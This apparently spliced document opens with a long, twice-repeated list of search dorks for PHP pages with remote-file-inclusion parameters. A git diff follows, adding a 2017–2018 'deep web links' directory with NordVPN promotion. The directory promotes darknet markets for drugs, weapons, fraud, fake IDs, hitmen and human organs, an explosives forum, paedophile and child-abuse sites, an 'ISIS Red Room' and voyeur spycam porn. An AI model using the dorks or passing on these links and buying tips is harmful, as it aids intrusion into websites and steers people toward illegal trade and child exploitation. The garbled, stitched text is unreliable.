+start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php +path_of_cpcommerce/_functions.php?prefix diff --git a/2017-2018DEEPWEBLINKS2_txt.md b/2017-2018DEEPWEBLINKS2_txt.md new file mode 100644 index 0000000..2737b8e --- /dev/null +++ b/2017-2018DEEPWEBLINKS2_txt.md @@ -0,0 +1,1314 @@ +# 2017-2018DEEPWEBLINKS2 + + +--- + +Web Search Engine) Links + +Hidden Wiki Links – Now you are here then you already know about deep web links / The Hidden Wiki / Dark web links. But before sharing large amount of .onion directory I want to share some very good deep web links which always help you, because all these are deep web search engine links by the help of these search engine you can find any latest working deep web marketplace, hidden wiki or deep web sites list. +Dark Web Marketplace + +Darknet markets is a solution for all type products because these type marketplace gives security to both party means seller or buyer, here you can use escrow service which make your payment mode more secure and clear. These type darknet markets places having some big number of listed categories and each category having more than thousands of unique products. + +So simple, Today If you are planning to buy anything on deep web/the hidden wiki then these markets can provide you all type products buying or selling opportunity and here you also can get more than one alternatives into single category. + +Mostly these deep web links having Drugs, Weapon, Digital products, Fraud, Services, Guide and Tutorials categories. + +Bellow I am giving you some very popular deep web Links (dark web links), which you can try but before using these hidden wiki links, you need to register yourself on these darknet markets deep web link. + +Note: If you are seller then these dark web marketplace links will proving milestone for you. where you can sell your products. and you can easily get targeted users or can achieve your goals within very short time span. + +Note: I am not recommending you to visit these deep web sites (dark web links), I only added these deep web sites/onion sites here for education purpose or freedom information. If you visit these deep web sites then this is total on your risk, but I am recommending you here before visiting these deep web sites make sure focus on your privacy Security. + +Recommended: For better security use NordVPN Onion Over Server + Tor Browser. ( Always run both software before access hidden Internet). + +http://pwoah7foa6au2pul.onion – Marketplace – Alphabay is most popular and trusted deep web market. If you are truly looking something trusted on deep web then Alphabay is one of the best market, And this marketplace also has all major categories items like as fraud, drugs, chemicals, Guide & Tutorials, Digital Products, Services, and much more. According to current status, This marketplace has more than 3 Lakh listed items, and Just now support two type crypto currency which is Monero and Bitcoins. + +Note: Before Buy any product here always check seller profile and available feedback and reviews. + +http://lchudifyeqm4ldjj.onion/ – Marketplace – Dream Market : Second largest and most trusted dark web market, also you can say alternative of alphaby market, This marketplace place have drugs and digital products, and both these category have more than 75000+ listed items which is huge. If you are looking another great platform then dream market can provide you right items. + +http://wallstyizjhkrvmj.onion/ – Marketplace – WallStreet Market – Another deep web markets which have more than 500+ listed items and each item are well categorized. According to category, You can get products related to drugs, counterfeits, jewelry & gold, services, Software & malware, security & hosting and much more.. and listing growing day to day. Marketplace support PGP and data encrypt by strong algorithm and also support German language. WallStreet has scam free status and multisig support. + +http://udujmgcoqw6o4cp4.onion – Deep Web Market – UnderGround, one of the best and reliable deep web market with the possibility to pay in two times. Markets have more than thousands listed items and items related to Prepaid cards, PayPal account, Diploma, Passport, ID Cards, Driver License, Phone, Computer, Tablets, Game Console, Hacker, Weapons, Professional Killer, Humen Organs, Medicines and so on. + +Note: This deep web links support JavaScript, If you want to access all function then you need to disable your javascript. But for security reasons, this is not good choice. + +http://valhallaxmn3fydu.onion – Marketplace – Valhalla: This deep web marketplace is also very popular into deep web world and mostly people prefer this hidden wiki marketplace url for buying drugs, gadgets, hire services and lot many more things. + +http://hansamkt2rr6nfg3.onion/ – Marketplace – Hansa is another famous deep web marketplace, which having more than 15K+ listed products. which is huge, and here you can buy all type products related to drugs, weapons, services, tutorials, services, electronics. It is one of most popular the dark web links. + +http://zocaloczzecchoaa.onion – Marketplace – Zocalo Marketplace: Same as other marketplaces this .onion directory links also having good amount of listing product. + +http://acropol4ti6ytzeh.onion – Marketplace – Acropolis forum also a good darknet markets, and community forum for sell and buy anything which you want, and also can find your questions answer in this dark web link. + +http://tochka3evlj3sxdv.onion – Marketplace – Tochka Free Market: Tochka is also good darknet market where you can find mostly all type product related to education, hacking, drugs, weapon, services and software. + +http://cryptomktgxdn2zd.onion – Marketplace – Crypto Market: Are you looking some other deep web links marketplace alternative then check out Crypto Market, Here you can participate in crypto market forum. + +Warning: Before browsing the Deep web links/the dark web links, always run your NordVPN Onion Over VPN Server with Tor Browser. Since Tor Browser doesn’t provide your complete anonymity and privacy. You are completely safe only if you use NordVPN software. + +http://kbhpodhnfxl3clb4.onion/ – not Evil (Tor Search Engine) for finding list of deep web sites, and one can easily find relevant information about the deep web/the hidden wiki which s/he want to get.. + +http://hss3uro2hsxfogfq.onion/ – not Evil search engine direct visit deep web links. + +Note: Now Tor search engine has been moved on new name, now this popular search engine also known as not Evil, in the current date not Evil having more than 12477146 .onion links database. +Grams Search Engine and Associated Deep Web Services Links: + +Grams is newly launched deep web search engine, this search engine getting good amount of popularity with in very short time and these days thousands of people use Grams for deep web access. You can access Grams by using below dark web link. + +http://grams7enufi7jmdl.onion/ – Grams Search Darknet Markets and more. + +Grams is not a single platform, but it’s like a Google, After couple month after grams launching date, Grams introduced some other product like Helix, Helix Light, Infodesk or Flow. + +All three having unique features. If you want to access these three Grams sub product, then you can access by the help of Grams deep web link, or you can also go by the help of bellow given direct dark web links. + +Note: Helix takes charge 2.5% every transaction. + +Helix Tor Directory Link: http://grams7enufi7jmdl.onion/helix/light + +InfoDesk: If you want to find any Vender, products or any specific marketplace tor link then this place can help you because here you can find some great marketplace which is trusted, and mostly people use in daily life.You can access InfoDesk using below deep web link. + +InfoDesk Hidden Wiki Link: http://grams7enufi7jmdl.onion/infodesk + +Flow: Now time for Flow, this is another popular deep web product which is also introduced by Grams, Hope you like Flow features because some person like this platform for Flow redirect feature. + +According to this, if you want to access any darknet markets and you didn’t remember tor directory link then you can access these type hidden wiki url or deep web links easily.. GramsFlow makes this type complicated process more easy. + +Now you only need to remember your marketplace name like Agora, Wiki, OutLaw, nuke or any other and you can access by help of Flow. + +For Example: if you want to access the hidden wiki then you need to type in your Tor Browser gramsflow.com/wiki, then holla your link redirect on actual tor hidden directory. + +For using awesome feature of Flow, visit below give deep web link. + +Flow Tor Hidden Directory Link: http://grams7enufi7jmdl.onion/infodesk + +http://skunkrdunsylcfqd.onion/sites.html – The Intel Wiki – This .onion site has the good number of trusted deep web links, which every day visited by most of the deep web users. But sometimes when I try to access this deep web link and I saw this dark web link is down. One more thing the Intel wiki also a forum which having great number of threads, which having useful information about the deep web and trusted deep web links/dark web links. + +http://auutwvpt25zfyncd.onion/ – Tor Links Directory – OnionDir having more than 1200+ listed dark web sites, one better thing is here you can see on top how many dark net sites are live and how many deep web sites not and All .onions links are well categorized according to categories. For Example: If you are looking hacking or drugs related marketplace deep web links then you need to click on required category and visit any deep web sites which you like. + +Forums & Community Deep Web Links(For Questions and Answers Conversation) + +If you are eager to learn the darknet hidden wiki forum, also want to deep discuss on this sensitive topic and looking best deep web forums and the hidden wiki links and if you also looking how to access the deep web latest news and updates. + +Deepwebsiteslinks is a best source where you can find all most popular deep web links, the hidden wiki news and darknet markets updates day to day and people visit here every day and participate into available threads. + +Here I am giving you some popular deep web forums and darknet community links/deep web links, which are sharing the deep web/the hidden wiki related news and current updates everyday. + +Privacy Tips: Always use NordVPN Onion Over Server with Tor browser while you accessing deep web sites. if you are thinking you are using TOR and you are safe. Let me clear for your privacy security. TOR doesn’t provide you full security. To access deep web with best anonymity and privacy, NordVPN and TOR both are must used software. + +http://rrcc5xgpiuf3xe6p.onion/ – Forum/Community – IntelExchange is my favorite the dark web community because here you can find information thread and also can ask your question, I like this because here you can find mostly pre-discussed thread which having lot of meaningful information like best dark web search engines, dark web browser, most trusted the hidden wiki url. + +http://parazite.nn.fi/roguesci/ – Forum – The Explosive and Weapon Forum, This hidden wiki link has some very good weapons and Explosive-related Documents and treads. + +http://zw3crggtadila2sg.onion/imageboard/ – Forum – TorChan is darknet forum where you ask and participates into running chat thread, but If you are first time visitors then you don’t know how to visit this website then simple type given URL and after press enter you will get one popup on screen then you need to put given Username and Password into both field, ByDefault Username or Password is torchan2, torchan2. this is most popular the hidden wiki forum, where every day more than thousands or visitors visit and share something very interesting. + +http://kpdqsslspgfwfjpw.onion/ – Forum/Community – A Chan, I think this deep web links having Russian language stuff, I can’t tell you about properly this site, and what type stuff this deep web sites have. + +http://rhe4faeuhjs4ldc5.onion/ – Forum/Community – Do you have any query related to white hate hacking or black hat techniques, and you want to know some secret hacking tips then this hidden wiki community will proving helpful stuff and gernals. having more than 20+ active threads. + +http://turkiyex6fkt46ra.onion/forum/ – Forum/Community/Non-English – Are you from Turkey, and looking your region related deep web forum then check out this hidden wiki forum link. + +http://anonywebix6vi6gz.onion/ – Forum/Community – This is newly launched dark net forum. This hidden wiki link also will proving helpful for you, if you want to discuss about the deepweb, darknet markets or any others. + +http://arcadian4nxs3pjr.onion/ – Forum/Community – ArcadiaNode is a dark net forum, Note: this deep web sites is not in the English language, that’s why I don’t have more idea about this forum. + +http://5dhf54nxiuuv6jvs.onion/ – Forum/Community – AXAHis Community: This is another deepweb (hidden wiki) community where you can share your questions and knowledge, also can interact with related people. + +Note: For access first time need registration. + +http://p22i3mcdceionj36.onion/index.php – Forum/Community – XenForo: This deep web marketplace is a forum, but here you can buy Pfizer and GG249 Xanax products. + +http://anonymzn3twqpxq5.onion/ – Forum/Community – Do you love DBA task and want to discuss on DBA related topics then check out this forum, hope this will proving helpful for you. + +http://z2hjm7uhwisw5jm5.onion/ – Forum/Community – WallStreet: If you having any query about Tor or Looking some hidden web related answer then you can try on this deep web link. + +http://support26v5pvkg6.onion/ – Forum/Community – Pedo Support Community: This Deep web forum is having more than 10K+ threads, like links, personal support, pedo literature, child love support, etc. + +http://suprbayoubiexnmp.onion/ – Forum/Community – SuperBay: This community is having very good amount of thread and everyday lot’s of visitors use these threads, If you have some problem, then you can find relevant thread, and can resolve your problem. + +https://blue.thevendingmachine.pw/index.php – Community/Forum – TheVendingMachine: This is very popular deep web community, every day more than 1000+ visitors visit this onion site, and share information. Here most popular thread is Torrent, Movies, General Discussion, TV shows, documentaries, etc. + +http://npdaaf3s3f2xrmlo.onion/ – Tor Community – TwitterClon is just like twitter sites here you can share everything which you want into form of tweet, hope you also enjoy this sites, but mostly time I saw this site down. +NordVPN 2 + +http://ji7nj2et2kyrxpsh.onion/ – Forum – Dark Web Forum: I don’t know what you can find here because this is non-english forum but as per my guess, hope you can discuss about dark web and also can participate into active threads. + +http://krainkasnuawwxmu.onion/ – Forum – Dark Web Community: This is the next Russian forum, where you can discuss about dark web community. If you have any question and want to know the right answers, then you can sign up on this forum and can find some easy solutions. + +http://fbcy5ylyoeqzqzcr.onion/ – Forum – Moneybook: Another dark web forum where you can discuss about all popular topics related to dark web like as onion links, dark web markets review, PayPal accounts, music movie sites and much more, hope here you can find some good thread for you. + +http://realpissxny3hgyl.onion/ – Forum/Porn – RealPiss Voyeur Community real uncensored female pee spycams: community for real girl piss videos and pictures, If you interested into such type content then you can try to visit realpiss site. + +http://zzq7gpluliw6iq7l.onion/threadlist.php? – Forum – The Green Machine: Another deep web forum which provides discussion threads, do you have any questions and want to know the right answers then The green machine dark web links can provide you right information. But If you want to participate into available threads then you need to registered yourself on this deep web forum. + +http://rutorzzmfflzllk5.onion/ – Forum/Russian – RuTor: Are you looking Russian forum, If yes then RuTor forum can provides you some great questions answer, but this forum not have more active thread, when I visited this deep web sites then I saw, website have only limited thread and also not have users engagement. + +http://bm26rwk32m7u7rec.onion/ – Forum – The Majestic Garden: This is another deep web forum, which provides free forum SMF software solution, If you have any questions about this software then you can visit this deep web sites. + +http://vrimutd6so6a565x.onion/ – Forum/Community – The Dark Lair: Forum for anonymous messaging, like as Twitter. Here you can share your status globally; Everyone can saw your status on this website. If they visit dark Lier, but you can’t post status on this site. Because you are not the registered member of Dark Lier, that’s the main reason. First your need to register on this website. Site also offers thread service and some good deep web links also. + +http://answerstedhctbek.onion/ – Forum/Community – Hidden Answers: I think you already know about the yahoo questions and answers, This site offer same service just like yahoo questions and answers, If you have any questions and want to get your questions answers then you can try this deep web links. + +http://saefjmgij57x5gky.onion/ – Forum/Community – TorStack – Q & A Community – Same Yahoo Questions and answer deep web sites, here you also can find right answers for your questions anonymously. + +http://dnmavengeradt4vo.onion/ – Forum/Community – DNM Avengers: Another deep web forum site which provides communicating portal for deep web users anonymously. forum already have more than 100+ active threads. If you have any questions and want to know right answer anonymously. You can participate on available relevant thread. Also, you can share your skills in these running threads. + +http://twittorxsun563wg.onion/ – Community/Social – Twitter Clone – This is microblogging site on the deep web, here you can share anything with all site readers anonymously. For status publishing you don’t need to signup here. + +http://i2vzg7f44bj4l3r7.onion/ – Community – The Alliance – Another deep web social community sites, where users can share his though with all alliance community member or personally with your friends. One more thing, site also offers bookmarks service, by which you can tag any links on the Bookmarks category. which every site readers can read and visit anonymously. + +http://www.smplace.com/forum/ – Forum/Community – S&M Place BDSM forum – Great Adult porn community for girls and boys, have all type threads where you can share adult porn videos and pictures, and also you can upload your videos and pictures collections. Forum have more than 70000+ active members. + +http://rekt5jo5nuuadbie.onion/hiddenchan/ – Forum/Community – HideenChan – If you don’t know about the hidden chan. HiddenChan is just like as another community forum, here you can participate into current active threads. But hiddenchan is very engaging community here you can see every illegal activity related thread and also you can watch available videos and pictures which is uploaded by various current members. + +http://start.jungswtfwgjwile2.onion/ – Forum/Community – Guys.WTF is primarily a community for people who love and love guys and / or feel sexually attracted by them. However, every interested person is expressly welcome. Here you want to help and support each other. + +http://bfvfq7hjcdoinzo4.onion/ – Forum/Community – Darknet Erotic Forum – This deep web forum offer threads related to hot, geil, horny, porn, pervers and etc. If you want to discuss about these topics then you can participate on available threads. But without registration you can’t participate in this community. + +http://rfwtogljhrrzxyrl.onion/ – Forum/Community – Lolita City – Another deep web forum, which offers hq legal stuff. Today when I visited this site, here only I found 2 threads. Hope here you can get your required information. + +Email/Messaging/Chat related Deep Web Links + +Warning: Always use NordVPN Tor Over Server + Tor Browser for complete security. Your privacy is not safe if you are accessing deep web links without VPN. + +Same ad normal traditional internet, deep web internet also having some email, chat or messaging .onion directory, mostly people use these sites for send message anonymously one to another person without reveal his identity or footprint. bellow I am giving you some common deep web links. + +http://sigaintevyh2rzvw.onion – Email Service – SIGANT is an anonymous email service provider, which provide full anonymous privacy to Sender or receiver, means no one can track your location and Identity. But If you are looking trusted deep web links for Email service then Sigaint is best for you. + +Note: Sigaint offers 50 MB mailbox space to every free signup users, If you need more mailbox space then you can buy $32 for a lifetime. For more premium account detail, visit at http://sigaintevyh2rzvw.onion/upgrade.html. – one more things you can access sigaint email on various email clients, I am also using this great email service for my personal use. + +http://zrwxcayqc4jgggnm.onion/ – Email – Adunanza OnionMail Server, If you want to get Email then check out this Dark Net Site. + +http://ypbnurlwfis7xsei.onion/ – Chat – Anon PasteBin– Platform for share your message and requirement anonymously front of a large amount of data. + +http://ncikv3i4qfzwy2qy.onion/ – Email – AnonInbox – Are you looking trusted and secure email inbox for you then check out AnonInbox Tor directory. + +http://bestchatzinhe3vc.onion/ – Chat – BestChat is another good deep web anonymous chat sites, not need registration + +http://vlr2sz44rxf5wmuu.onion/ – Chat – ISIS Red Room: If you visit this site make sure check your security. + +http://r2j4xiyckibnyd45.onion/ – Chat – BoyChat: This Darknet site offering anonymous chat service. + +http://4fvfamdpoulu2nms.onion/ – Chat – Lucky Eddie’s Home: This Dark web site providing file uploader, anonymous chat service. + +http://tt3j2x4k5ycaa5zt.onion/chat.php – Chat – Denial Home MyChat: This is an anonymous chat room where you can share anything, but child pornography is not allowed here, hope this chat place will proving helpful for you. Note: Before access, this chat room, make sure check your security. + +http://vola7ileiax4ueow.onion/ – Chat/Email – Volatile: Another dark web links which offer chat, git, email, info related service, but don’t know how to use this service, if you know the right way how to use this site for personal use then please share with us. I will update all things on site description section. + +http://mswmailgcjbye4sc.onion/ – Chat/Email – MSW(My Secrete World): According to this deep web links, if you sign up here, then you can ‘t send email to outside internet or dark web. You can send only message on MSW network, simple means outside of this site you can’t send message or email. This is fully local email service which is run only one MSW server. For a new account, you need to discuss to site admin then they will create for you new email address. + +http://ozon3kdtlr6gtzjn.onion/ – Email – O3mail: another dark web link which provides anonymous email service but you can access this site service only in javascript enable mode, which is very bad for anonymous identity. + +https://344c6kbnjnljjzlz.onion/ – Email – VFEmail: This deep web sites also offer email service, but one thing is very good here. VFEmail service supports PGP encryption. But for the mailbox, you need to buy his premium services. Available premium offers are copper, bronze, silver, gold, platinum. And each offer has unique features, and you can select any offer according to your requirement. + +http://cwu7eglxcabwttzf.onion/ – Email – Confidant Mail: this is open source non-SMTP cryptographic email service, which supports optimized large file attachment, this email deep web sites offer the easiest way for PGP encryption. When you create your new account, then email service also create one public key automatically for you. For more information visit given email service deep web links. + +http://mail2get4idcbfwe.onion/ – Email – Mail2Tor: excellent anonymous email service deep web links, by this email service anyone can send and receive email anonymously via email clients and webmail, If you want to access this email service then you need to install Tor browser into your computer. + +http://grrmailb3fxpjbwm.onion/ – Email – TorGuerrillaMail – Disposable Temporary E-Mail Address: Many times we faced some critical conditions, and need some email services which don’t offer permanent email box and also offer self-distraction service. SelfGuerrilla provides both type services, not need to signup here; you can use this email service for a temporary purpose. + +http://eozm6j6i4mmme2p5.onion/ – Email – MailCity: Another deep web email service for the mailbox, do you still finding another alternative for email then visit this deep web links and create your account here, according to website, mailcity offer permanent, portable email service. Do you want to know more information about offers features then check out this Onion links http://eozm6j6i4mmme2p5.onion/features.php. + +http://sinbox4irsyaauzo.onion/ – Email – Sinbox: Are you looking another good mailbox alternative on the deep web, If yes then Today I found one email service links which offer good security mailbox. Sinbox provides multi-layered encryption technique based encrypted mailbox, support max five MB attachment also support Tor network, not required enable javascript. + +Note: Whenever you create your account on sinbox then sinbox will create a private key for you, by which you can access your mailbox anytime when you want, and also you can save this private key locally into your computer. +NordVPN 2 + +http://dhbzkbw3ngxxt56q.onion/ – Email – SimplePM: According to this deep web email site, when you visit this site and create your account then you will get every time new mailbox address means you can not create stable mailbox here. But here you have one benefit, if you bookmark your newly created mailbox address, then you can access will soon by the help of bookmark address. + +http://cockmailwwfvrtqj.onion/ – Email – Cock.li – Yeah it’s mail with cocks: still finding deep web links for mailbox then check out cock.li email service, this is complete free email service but if you feel cock.li is right for you, then you can donate some BTC and can help to run this great email service. + +http://bitmailendavkbec.onion – Email – Bitmessage Mail Gateway: This is another great alternative for send message anonymously on the deep web, buy the help of bitmessage address you can send message or email on the any anonymous email service which support bitmessage. Sigaint.org is a great example of this, and if you upgrade your account into sigaint, then they will provide you new bitmessage address, which through you can get emails in your email box. + +http://torbox3uiot6wchz.onion/ – Email – TorBox: This is another alternative email service which you can access into Tor network and outside Tor network you can’t access this email service. If you are looking any email service which can work into hidden internet environment, then try this email service. + +http://it.louhlbgyupgktsw7.onion/ – Email – Onion Mail: Another trusted deep web email service, but I don’t have any experience with this email service that’s why I can’t share with you anything, but according to websites status you can create your email service any of available services like Linux, windows or ubuntu. Do you want to know more about this email service then visit this deep web sites? + +http://oxicsiwet42jw4h4.onion/ – Email – Bitmaila: Another excellent premium email service which provides mailbox only in 0.001 BTC. Which is equal to $0.60. But this offer only for first 1000 users, if you are looking any good anonymous deep web email service then you can try this dark web sites. Emai service also supports Dovecot, Postfix, SOGO, SquirrelMail, SpamAssassin, ClamAV server configuration. + +http://lelantoss7bcnwbv.onion/ – Email – Lelantos: Another website for email service, according to site status. Lenlantos is a non-profit organization, which always believe into human privacy. If you are searching new website for email service then Lelantos can provide you good service, for know about more feature check out website. + +http://mdj7ldtgoq22m3hi.onion/ – Extra/Chat – C4MTOR – This site offers private chat service. If you want to join into this private chat shows, then first your need to pay some BTC in given BTC address, you will got Chat shows access username or password. + +Note: Always beware these type scams. I am not sure this is a genuine site or not.. + +http://vps69555.vps.ovh.ca/ – Chat – Alienet – This is alienet IRC based chat server, I don’t have skills about how to setup this IRC, but If you want to access this IRC 